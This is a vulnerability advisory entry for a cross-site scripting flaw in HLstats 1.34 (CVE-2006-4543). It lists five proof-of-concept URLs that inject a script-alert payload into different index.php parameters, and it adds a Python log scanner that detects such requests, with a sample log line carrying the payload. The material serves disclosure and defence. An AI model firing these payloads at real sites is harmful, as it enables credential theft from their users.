HLstats 'Index.PHP' Cross-Site Scripting Vulnerability

Vulnerability ID: 1110921
Vulnerability type: Cross-site scripting
Published: 2006-08-30
Updated: 2006-09-06
CVE ID: CVE-2006-4543
CNNVD ID: CNNVD-200609-028
Platform: PHP
CVSS score: 6.8
|Vulnerability Source
https://www.exploit-db.com/exploits/28446
https://cxsecurity.com/issue/WLB-2006090018
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-028
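|Vulnerability Details
Cross-site scripting (XSS) vulnerability in index.php in HLstats 1.34 allows remote attackers to inject arbitrary web script or HTML via (1) the game parameter in players mode, (2) the weapon parameter in weaponinfo mode, (3) the st parameter in search mode, (4) the action parameter in actioninfo mode, and (5) the map parameter in mapinfo mode.
|Exploit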
source: http://www.securityfocus.com/bid/19771/info

HLstats is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data.

Exploiting these issues may help an attacker steal cookie-based authentication credentials and launch other attacks.

Version 1.34 is reported vulnerable; other versions may also be affected.

http://www.example.com/index.php?mode=players&game=%3Cscript%3Ealert(123)%3C/script%3E
http://www.example.com/index.php?mode=weaponinfo&weapon=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://www.example.com/index.php?mode=search&q=whatever&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://www.example.com/index.php?mode=actioninfo&action=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc
http://www.example.com/index.php?mode=mapinfo&map=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc

(instead of 'tfc' you should use the game HLstats is configured for)
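
A log-review sketch for the five mode/parameter pairs listed above, as an added example that is not part of the original advisory or of HLstats itself: it flags index.php requests whose affected parameter decodes to markup characters. The function names, the combined log format, and the sample lines are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# mode -> reflected parameter, as listed in the advisory for HLstats 1.34 index.php
REFLECTED = {
    "players": "game",
    "weaponinfo": "weapon",
    "search": "st",
    "actioninfo": "action",
    "mapinfo": "map",
}
MARKUP = set('<>"')  # characters that let a value break out into HTML

def suspicious_params(url):
    """Return [(mode, param, decoded_value)] for advisory parameters carrying markup."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("index.php"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    hits = []
    for mode in query.get("mode", []):
        param = REFLECTED.get(mode.lower())
        if param is None:
            continue
        for value in query.get(param, []):
            if MARKUP & set(value):
                hits.append((mode, param, value))
    return hits

def scan_access_log(lines):
    """Yield (client_ip, hit) for each combined-log-format line that matches."""
    for line in lines:
        try:
            client = line.split(" ", 1)[0]
            request = line.split('"')[1]      # e.g. 'GET /path?query HTTP/1.1'
            target = request.split(" ")[1]
        except IndexError:
            continue                          # malformed line, skip it
        for hit in suspicious_params(target):
            yield client, hit

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [30/Aug/2006:10:00:00 +0000] "GET /index.php?mode=players&game=tfc HTTP/1.1" 200 5120',
    '203.0.113.9 - - [30/Aug/2006:10:00:05 +0000] "GET /index.php?mode=search&q=x&st=%3Cscript%3Ealert(123)%3C/script%3E&game=tfc HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for client, hit in scan_access_log(SAMPLE):
        print(client, hit)
```

The check decodes each value once, so a double-encoded value (for example `%253C`) is not flagged and would need a second decoding pass.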
|References

Source: BID
Name: 19771
Link: http://www.securityfocus.com/bid/19771
Source: BUGTRAQ
Name: 20060830 XSS in HLstats 1.34
Link: http://www.securityfocus.com/archive/1/archive/1/444716/100/0/threaded
Source: SECUNIA
Name: 21635
Link: http://secunia.com/advisories/21635
Source: SREASON
Name: 1490
Link: http://securityreason.com/securityalert/1490